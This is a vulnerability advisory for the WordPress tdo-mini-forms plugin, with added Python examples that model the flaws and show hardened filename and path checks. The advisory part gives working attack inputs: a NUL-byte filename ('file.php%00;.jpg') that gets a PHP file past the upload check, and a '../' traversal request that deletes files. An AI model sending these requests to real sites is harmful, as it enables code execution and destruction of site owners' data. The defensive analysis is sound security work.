wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities
 
------------------------------------------------------------
wordpress tdo-mini-forms plugin (remote file upload/remote file deletion) Vulnerabilities
Author : Cold z3ro , www.hackteach.org , www.s3curi7y.com
Anonymous => You are the man 
 
 
# Remote file upload :

The inline upload handler accepts a file for any form id without validating the filename properly:

wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

file extension : file.php%00;.jpg
(%00 is a NUL byte: an extension check that looks at the end of the string sees ".jpg", while a filesystem call that takes the name as a C string, as PHP did before 5.3.4, stops at the NUL and writes the file as file.php)
uploaded path :
wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(the uploading client's IP)/$filename.PHP%00;.jpg

Example of the uploaded path :
wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg
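The following is an added example, not code from the advisory or from the plugin. It models why the NUL-byte filename above passes a naive extension check and what name the file ends up with on disk, and puts a hardened filename validator next to it. The allowlist of image extensions and the function names are assumptions for illustration; the payload string is the one from the advisory, URL-decoded so %00 becomes a real NUL byte as it would be in the multipart body.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

# Assumed allowlist; the plugin's real list is not given in the advisory.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}
# Conservative shape: one name segment, one extension, no other characters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$")

# Filename from the advisory, decoded so %00 is an actual NUL byte.
PAYLOAD_NAME = unquote("z3ro.PHP%00;.jpg")


def naive_extension_ok(filename: str) -> bool:
    """Extension check that only inspects the text after the last dot.

    This is the kind of check the NUL-byte trick defeats: the string still
    ends in ".jpg", so the upload is accepted.
    """
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXTENSIONS


def effective_stored_name(filename: str) -> str:
    """Name the file actually gets when the path is handed to a C-string
    based filesystem call (PHP before 5.3.4 behaved this way): everything
    from the first NUL byte onward is dropped."""
    return filename.split("\x00", 1)[0]


def hardened_upload_name(filename: str) -> Optional[str]:
    """Return a safe basename, or None if the upload must be rejected.

    Rejects NUL and other control bytes outright, strips any directory
    part, allows only a conservative character set with exactly one
    extension, and checks that extension against the allowlist.
    """
    if any(ord(c) < 0x20 for c in filename):
        return None
    base = posixpath.basename(filename.replace("\\", "/"))
    if not SAFE_NAME.match(base):
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    return base


if __name__ == "__main__":
    print("naive check accepts payload:", naive_extension_ok(PAYLOAD_NAME))
    print("name written to disk:", effective_stored_name(PAYLOAD_NAME))
    print("hardened check result:", hardened_upload_name(PAYLOAD_NAME))
```

The hardened validator does not try to "clean" a suspicious name; anything with a control byte, a second extension or a path separator is refused, and the server should also store uploads under a directory where PHP execution is disabled.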
 
 
 
# Remote file deletion

=> Note : use any HTTP POST header/parameter modifier to send the following fields.

tdomf_form_id = 1;
deletefile[]  = 1;
filepath      = $variable ( wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg )
index         = NULL

The filepath value is resolved relative to the plugin directory (hence the three ../ in the example) and is not confined to the tdomf upload directory, so "../" sequences walk out of wp-content/plugins/tdo-mini-forms/ and the handler unlinks whatever path results.

Example result (same parameters, shown as a query string) :
wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index=
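The following is an added example, not code from the advisory or from the plugin. It shows where the advisory's filepath value lands when an unchecked handler joins it to the plugin directory, and contrasts that with a delete routine that builds the target from server-side facts (form id, client IP) plus a bare filename and refuses anything that would leave the upload root. The relative "wordpress/" install prefix and the paths are taken from the advisory; the function names and the extra "../../../outside.txt" input are constructed for illustration.

```python
import posixpath
from typing import Optional

# Directory the vulnerable script runs from and the upload root, both taken
# from the paths in the advisory (relative install prefix for illustration).
PLUGIN_DIR = "wordpress/wp-content/plugins/tdo-mini-forms"
UPLOAD_ROOT = "wordpress/wp-content/uploads/tdomf/tmp"

# filepath value from the advisory's deletion example, with %00 decoded.
ADVISORY_FILEPATH = (
    "../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP\x00;.jpg"
)


def c_string(path: str) -> str:
    """Emulate NUL truncation of a path passed to a C-string filesystem call."""
    return path.split("\x00", 1)[0]


def vulnerable_unlink_target(filepath: str) -> str:
    """Path an unchecked handler would unlink: the attacker-supplied value
    joined to the script's directory and normalised, '..' segments included."""
    return posixpath.normpath(posixpath.join(PLUGIN_DIR, c_string(filepath)))


def hardened_unlink_target(form_id: str, client_ip: str, filename: str) -> Optional[str]:
    """Build the delete target from server-side values plus a bare filename.

    The client never supplies a path: NUL bytes and separators are refused,
    the form id must be numeric, and the normalised result must still lie
    under UPLOAD_ROOT. Returns None when any of that fails.
    """
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return None
    if filename in ("", ".", ".."):
        return None
    if not form_id.isdigit():
        return None
    target = posixpath.normpath(posixpath.join(UPLOAD_ROOT, form_id, client_ip, filename))
    root = UPLOAD_ROOT.rstrip("/") + "/"
    if not target.startswith(root):
        return None
    return target


if __name__ == "__main__":
    print("unchecked handler unlinks:", vulnerable_unlink_target(ADVISORY_FILEPATH))
    print("constructed traversal input unlinks:", vulnerable_unlink_target("../../../outside.txt"))
    print("hardened, bare name:", hardened_unlink_target("1", "127.0.0.1", "z3ro.PHP"))
    print("hardened, traversal:", hardened_unlink_target("1", "127.0.0.1", "../../../outside.txt"))
```

In a real deployment the containment check should run on the realpath of the candidate (after symlinks are resolved) rather than on the string, and the form id and IP components should come from the server's own records of the upload, never from the request.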
 
Eof;